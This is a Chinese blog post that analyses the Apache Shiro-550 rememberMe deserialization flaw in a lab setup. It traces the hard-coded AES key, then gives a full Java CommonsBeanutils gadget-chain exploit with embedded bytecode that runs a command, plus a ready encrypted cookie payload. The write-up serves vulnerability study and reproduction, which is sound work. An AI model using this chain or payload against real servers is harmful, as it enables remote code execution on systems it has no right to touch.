shiro-550反序列化漏洞原理分析详解

已于 2024-01-25 11:24:49 修改
阅读量1.2k 收藏 37
点赞数 35
分类专栏: 漏洞复现 crypto 文章标签: 加密解密 java 网络安全
于 2024-01-25 11:14:42 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_49490199/article/details/135752129
版权

shiro-550反序列化漏洞原理分析详解

环境搭建

这里的 shiro 环境使用P牛的项目[项目地址],clone 这个项目代码到本地,用 idea 打开

配置maven依赖

打开之后,使用 maven 重新加载一下 pom.xml 中的依赖
在这里插入图片描述

配置 tomcat

右上角点击编辑配置
在这里插入图片描述
添加本地的 tomcat 服务器在这里插入图片描述
选择你 tomcat 解压的目录在这里插入图片描述添加工件的部署
在这里插入图片描述选择shirodemo:war

在这里插入图片描述
然后就可以直接运行起来了

在这里插入图片描述
登录的账号密码在shiro.ini文件中
在这里插入图片描述
使用root:secret就可以成功登录,登录的时候要勾选 Remember me 选项
在这里插入图片描述

漏洞分析

加密流程分析

既然漏洞出现在 rememberMe 字段,那就先分析 rememberMe 的值是如何生成的

先正常登录一次系统,可以获取到一段经过加密的 rememberMe 值

在这里插入图片描述
首先来到登录判断的地方,在 DefaultSecurityManager.java 中进行登录的判断

在这里插入图片描述
在登录成功的函数 onSuccessfulLogin 处下个断点跟进分析
可以看到 token 中存储了登录的账号密码信息

在这里插入图片描述
一直往下跟进,直到 byte[] bytes = serialize(principals);

在这里插入图片描述
发现此处是在对登录的用户名root进行序列化的操作,然后判断加密方式是否为空

在这里插入图片描述
很明显此处不为空,并且根据属性的一些值能够判断,该加密方式为 AES的CBC模式 加密,进入判断,调用encrypt函数对用户名的序列化值 bytes 进行加密

继续跟进encrypt函数,可以发现里面又调用了 cipherService的encrypt函数,并且传入了两个参数

在这里插入图片描述

第一个参数 Serialized 就是传入的root序列化结果
第二个参数调用了 getEncryptionCipherKey() 方法的返回值,其实看方法名大概能够猜出这个方法是用来获取加密的key
跟进这个方法看看,发现就是返回了一个变量encryptionCipherKey 的值

在这里插入图片描述

右键查找一下 encryptionCipherKey 的用法,可以看到这个变量在下面的 setEncryptionCipherKey 方法中被赋值,再看一下谁调用了setEncryptionCipherKey ,发现是 setCipherKey 调用了这个函数

在这里插入图片描述
再继续查找 setCipherKey 的用法,发现该函数传入了 DEFAULT_CIPHER_KEY_BYTES 这个参数

在这里插入图片描述
继续查找 DEFAULT_CIPHER_KEY_BYTES 参数的定义,找到这个参数其实就是一个写死在代码中的字符串kPH+bIxk5D2deZiIxcaaaA==,也就是AES加密 key 的base64编码

在这里插入图片描述
所以,getEncryptionCipherKey()函数就是返回了 kPH+bIxk5D2deZiIxcaaaA== 这个字符串作为加密的 key

再进行跟进 encrypt 函数,发现里面还有个 ivBytes 变量,通过调用 generateInitializationVector(false) 方法获取值

在这里插入图片描述
这里 generateInitializationVector(false) 方法其实就是获取一个16字节是随机值,作为 AES 加密的 iv 值,然后再调用下面的 encrypt 函数,并且传入 序列化的值、key、iv 等参数
在这里插入图片描述
进入到 encrypt 函数中

在这里插入图片描述

  1. 判断 iv 是否为空并且长度要大于 0
  2. 对序列化后的用户名进行 AES CBC模式 的加密,将值赋给encrypted
  3. 创建一个 output 字节数组,并且数组的长度设置为 iv+ encrypted 的总长度
  4. 把 iv 值放到 output 数组中
  5. 把 encrypted 附加到 output 数组中

output数组中最后存储的就是 iv + encrypted (AES加密的序列化用户名),并返回

整个加密流程就是这样的,最后再对 output 进行 base64 编码并赋值给 rememberMe 作为响应头返回,流程就结束了

进行解密验证

验证一下该加密流程,对 rememberMe 字段进行手动解密

在这里插入图片描述
先对字段进行base64解码,在转换成16进制,提取处前面的16字节32位 6e1ba0729b4112174b30a59fef008387 应该就是 iv ,后面剩下的是加密的序列化用户名

在这里插入图片描述
对结果解密后,可以看到该字符串结果确实符合java序列化的格式
在这里插入图片描述

漏洞利用

由于AES是对称加密,所以知道了加密的 key 和 iv 也就知道了解密的 key 和 iv

使用 CB1 链进行命令执行 Calc 命令弹个计算器

注意 CB1 链依赖包的版本要与 shiro 依赖包的版本一致
使用 Maven Helper 插件查看 shiro1.2.4 的依赖包版本

  • commons-beanutils 1.8.3
  • commons-collections 3.2.1
    在这里插入图片描述使用 CB1 链生成执行 Calc 序列化的数据

CB1

package main.java;

import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
import org.apache.commons.beanutils.BeanComparator;

import javax.xml.transform.TransformerConfigurationException;
import java.io.FileOutputStream;
import java.io.IOException;
import java.io.ObjectOutputStream;
import java.lang.reflect.Field;
import java.lang.reflect.InvocationTargetException;
import java.util.Base64;
import java.util.PriorityQueue;

public class CB1 {
    public static void main(String[] args) throws InvocationTargetException, IllegalAccessException, NoSuchMethodException, NoSuchFieldException, TransformerConfigurationException, IOException, ClassNotFoundException {
        //继承了 ABSTRACT_TRANSLET 父类的 Runtime.getRuntime().exec("calc") 的 class 字节码数据
        byte[] code = Base64.getDecoder().decode("yv66vgAAADQAIQoABgATCgAUABUIABYKABQAFwcAGAcAGQEABjxpbml0PgEAAygpVgEABENvZGUBAA9MaW5lTnVtYmVyVGFibGUBAApFeGNlcHRpb25zBwAaAQAJdHJhbnNmb3JtAQByKExjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvRE9NO1tMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9zZXJpYWxpemVyL1NlcmlhbGl6YXRpb25IYW5kbGVyOylWBwAbAQCmKExjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvRE9NO0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL2R0bS9EVE1BeGlzSXRlcmF0b3I7TGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjspVgEAClNvdXJjZUZpbGUBAA1jb2RlVGVzdC5qYXZhDAAHAAgHABwMAB0AHgEABGNhbGMMAB8AIAEAH2NvbS9odWF3ZWkvQ2xhc3NMb2FkZXIvY29kZVRlc3QBAEBjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvcnVudGltZS9BYnN0cmFjdFRyYW5zbGV0AQATamF2YS9sYW5nL0V4Y2VwdGlvbgEAOWNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9UcmFuc2xldEV4Y2VwdGlvbgEAEWphdmEvbGFuZy9SdW50aW1lAQAKZ2V0UnVudGltZQEAFSgpTGphdmEvbGFuZy9SdW50aW1lOwEABGV4ZWMBACcoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvUHJvY2VzczsAIQAFAAYAAAAAAAMAAQAHAAgAAgAJAAAALgACAAEAAAAOKrcAAbgAAhIDtgAEV7EAAAABAAoAAAAOAAMAAAALAAQADAANAA0ACwAAAAQAAQAMAAEADQAOAAIACQAAABkAAAADAAAAAbEAAAABAAoAAAAGAAEAAAARAAsAAAAEAAEADwABAA0AEAACAAkAAAAZAAAABAAAAAGxAAAAAQAKAAAABgABAAAAFQALAAAABAABAA8AAQARAAAAAgAS");
        TemplatesImpl templates = new TemplatesImpl();

        Field name = templates.getClass().getDeclaredField("_name");
        name.setAccessible(true);
        name.set(templates,"ClearMe");

        Field bytecodes = templates.getClass().getDeclaredField("_bytecodes");
        bytecodes.setAccessible(true);
        bytecodes.set(templates,new byte[][]{code});

        Field tfactory = templates.getClass().getDeclaredField("_tfactory");
        tfactory.setAccessible(true);
        tfactory.set(templates,new TransformerFactoryImpl());

        BeanComparator beanComparator = new BeanComparator();

        PriorityQueue priorityQueue = new PriorityQueue(1, beanComparator);
        priorityQueue.add(1);
        priorityQueue.add(1);

        beanComparator.setProperty("outputProperties");
        Field queue = PriorityQueue.class.getDeclaredField("queue");
        queue.setAccessible(true);
        queue.set(priorityQueue,new Object[]{templates, templates});
        
        //序列化 priorityQueue 生成 ser.bin 文件
        serialize(priorityQueue);
    }
    public static void serialize(Object obj) throws IOException {
        ObjectOutputStream oos = new ObjectOutputStream(new FileOutputStream("ser.bin"));
        oos.writeObject(obj);
    }
}

运行上述代码后会在当前目录生成一个 ser.bin 文件,这个 ser.bin 中就序列化的命令执行代码

同样使用 AES 的 CBC 模式进行加密,key 为 shrio 中硬编码的 key,iv 随便填写一个16字节长度的数据就行,只是最后要把 iv 放在加密数据的前面
key (bas64编码): kPH+bIxk5D2deZiIxcaaaA==
iv (16进制) :0123456789abcdef0123456789abcdef

在这里插入图片描述
然后再得到的加密数据前加上 iv ,再进行 base64 编码

在这里插入图片描述
将得到的数据作为 cookie 中 rememberMe 字段的参数进行发起请求,就可以成功命令执行

在这里插入图片描述附上此处的 payload :

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

m0_49490199
关注
  • 35
    点赞
  • 37
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Shiro反序列化漏洞(Shiro-550Shiro-721)
做自己喜欢的事,并将其发挥到极致!
12-21 6750
0x01 Shiro介绍 Apache Shiro 是一个强大易用的Java安全框架,提供了认证、授权、加密和会话管理等功能,Shiro框架直观、易用、同时也能提供健壮的安全性。 Apache Shiro反序列化漏洞分为两种:Shiro-550Shiro-721 0x02 Shiro-550 反序列化漏洞 CVE-2016-4437 漏洞原理 Apache Shiro框架提供了记住密码的功能(RememberMe),用户登录成功后会生成经过加密并编码的Cookie,在服务端对rememberMe的Cook
Shiro反序列化漏洞检测工具
01-05
Shiro1.2.4及以下版本存在反序列化漏洞,该工具用于测试该漏洞
shiro 反序列化漏洞综合利用工具 shiro_attack_by J1anfen
11-05
shiro 反序列化漏洞综合利用工具 shiro_attack_by J1anfen,里面的 jar 直接运行即可,用于 shiro 漏洞检测、修复验证等
shiro550反序列化漏洞原理漏洞复现(基于vulhub,保姆级的详细教程)
Bossfrank的博客
04-16 9669
本文是shiro550漏洞(CVE-2016-4437)的漏洞原理漏洞复现。本文所有使用的工具和脚本都会在文末给出链接。使用vulhub搭建靶场,漏洞复现包括手动构造cookie的payload或使用shiro550的图形化漏洞利用工具,最终实现反弹shell和任意命令执行。
Shiro反序列化漏洞Shiro-550反序列化漏洞复现
最新发布
人若无名,便可专心练剑
03-14 1032
Shiro-550反序列化漏洞大约在2016年就被披露了,但感觉直到近一两年,在各种攻防演练中这个漏洞才真正走进了大家的视野,Shiro-550反序列化应该可以算是这一两年最好用的RCE漏洞之一,原因有很多:Shiro框架使用广泛,漏洞影响范围广;攻击payload经过AES加密,很多安全防护设备无法识别/拦截攻击……
网络安全---漏洞复现】shiro550反序列化漏洞原理漏洞复现和利用(基于vulhub,保姆级的详细教程)
m0_67844671的博客
09-21 2740
shiro550反序列化漏洞原理漏洞复现和利用(基于vulhub,保姆级的详细教程);Apache Shiro是一个强大且易用的Java安全框架,执行身份验证、授权、密码和会话管理。使用Shiro的易于理解的API,您可以快速、轻松地获得任何应用程序,从最小的移动应用程序到最大的网络和企业应用程序;
shiro 550 反序列化rce
m0_65096687的博客
06-04 999
然后我们抓包进行测试,使用shiro框架的主要特征是在返回包中,登录失败或者登录成功没有勾选remeber 按钮,返回数据包有一个remeber delete 字段,如果正确密码登录且勾选了remember me 字段。那么返回数据包就会出现 remember的字段会出现一长串的值。(这是看大佬的文章总结的)加密的用户信息序列化后储存在名为remenber -me的cooike中。Apach shiro 是一款开源安全框架,提供身份验证,授权,会话管理等。这是密码正确勾选了 remember me。
shiro反序列化-550&721
黑白的博客
06-29 3845
清楚了shiro的工作流程,工作流程中也说了,是有反序列化操作的,既然有反序列化,就要看我们序列化的内容是否可控,也就是rememberMe字段中的内容是否可控,乍一看肯定是不行的,虽然base64相当于明文,但是AES可不是,AES是有秘钥的,值得回味的是,shiro的默认秘钥是个硬编码写在代码里面了,源码也是默认的,用户也没有更换的话,那么就给了我们构造序列化数据的机会了影响版本。
shiro反序列化漏洞暴力破解漏洞检测工具
09-14
1.shiro反序列化漏洞、暴力破解漏洞检测工具源码 2.shiro反序列化漏洞、暴力破解漏洞检测工具jar包 3.shiro反序列化漏洞、暴力破解漏洞检测工具启动方法 4.shiro反序列化漏洞、暴力破解漏洞检测工具使用方法 5.shiro...
Shiro反序列化漏洞Shiro版本升级资源
06-22
从上面我们了解到,反序列化漏洞主要是由于硬编码引起的,那么只要解决硬编码,就解决了该漏洞。解决硬编码主要有两种方式: 方法一:自行实现key值 方法二:升级到1.2.5版本或以上 那么在我的项目中,选择的是升级...
shiro反序列化漏洞利用工具
11-09
图形化界面,该工具支持漏洞检测,请勿用作非法途径,否则后果自负。 Shiro550无需提供rememberMe Cookie,Shiro721需要提供一个有效的rememberMe Cookie 可以手工指定特定的 Key/Gadget/EchoType(支持多选),如果...
Java反序列化Shiro-550漏洞分析笔记
qq_48201589的博客
01-29 1342
ShiroAES加密-->Base64加密的过程,接收后会进行Base64解密-->AES解密-->反序列化进行验证身份信息。漏洞点在于AES加密为对称加密,而加密时利用的key为固定值,这就导致,我们可以生成一条恶意的payload,进而达到RCE的目的。
Shiro反序列化550漏洞复现
败在我手中之敌,从来不会被我视为对手,我给你时间追赶,直至你遥望不见。
07-05 1356
Shiro 是一个强大且易于使用的 Java 安全框架,用于身份验证、授权和会话管理等功能。它提供了一套灵活的基于角色的访问控制(RBAC)机制,可以轻松地集成到现有的 Java 应用程序中。影响版本原理shiro默认使用了Cookie RememberMe Manager,其处理cookie的流程是:得到rememberMe的cookie值–>Base64解码–>AES解密–>反序列化 然而AES的密钥是硬编码的,就导致了攻击者可以构造恶意数据造成反序列化的RCE漏洞shiro的身份认证工作流程。
shiro550反序列化
jy13172的博客
07-23 555
java反序列化
[Java安全学习]Shiro550原理分析以及攻击演示
GX233的博客
07-13 550
Shiro550反序列化漏洞原理分析与攻击
Shiro 550、721
nana1253431195的博客
08-31 1187
Apache Shiro 是一个功能强大且易于使用的 Java 安全框架,它用于处理身份验证,授权,加密和会话管理在默认情况下 , Apache Shiro 使用 CookieRememberMeManager 对用户身份进行序列化/反序列化 , 加密/解密和编码/解码 , 以供以后检索 .因此 , 当 Apache Shiro 接收到未经身份验证的用户请求时 , 会执行以下操作来寻找他们被记住的身份....
buu刷题第四周
enhengzZ的博客
02-12 615
javaweb WEB-INF主要包含一下文件或目录: /WEB-INF/web.xml:Web应用程序配置文件,描述了 servlet 和其他的应用组件配置及命名规则。 /WEB-INF/classes/:含了站点所有用的 class 文件,包括 servlet class 和非servlet class,他们不能包含在 .jar文件中 /WEB-INF/lib/:存放web应用需要的各种JAR文件,放置仅在这个应用中要求使用的jar文件,如数据库驱动jar文件 /WEB-
shiro550代码审计(巨详细)--加密部分
zyer
03-16 5691
找了一下大佬的文章借鉴了一下shiro550的利用流程 (Shiro 550 反序列化漏洞 详细分析+poc编写) 简单介绍利用: 通过在cookie的rememberMe字段中插入恶意payload, 触发shiro框架的rememberMe的反序列化功能,导致任意代码执行。 shiro 1.2.24中,提供了硬编码的AES密钥:kPH+bIxk5D2deZiIxcaaaA== 由于开发人员未修改AES密钥而直接使用Shiro框架,导致了该问题 于是我们......
shiro-550反序列化漏洞shiro-721反序列化漏洞的区别
04-13
这是一个技术问题,Shiro-550漏洞Shiro-721漏洞都是Apache Shiro框架中的反序列化漏洞,但Shiro-550漏洞主要是由于使用了不安全的Java反序列化进行身份验证,而Shiro-721漏洞主要是由于Shiro的rememberMe功能中...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值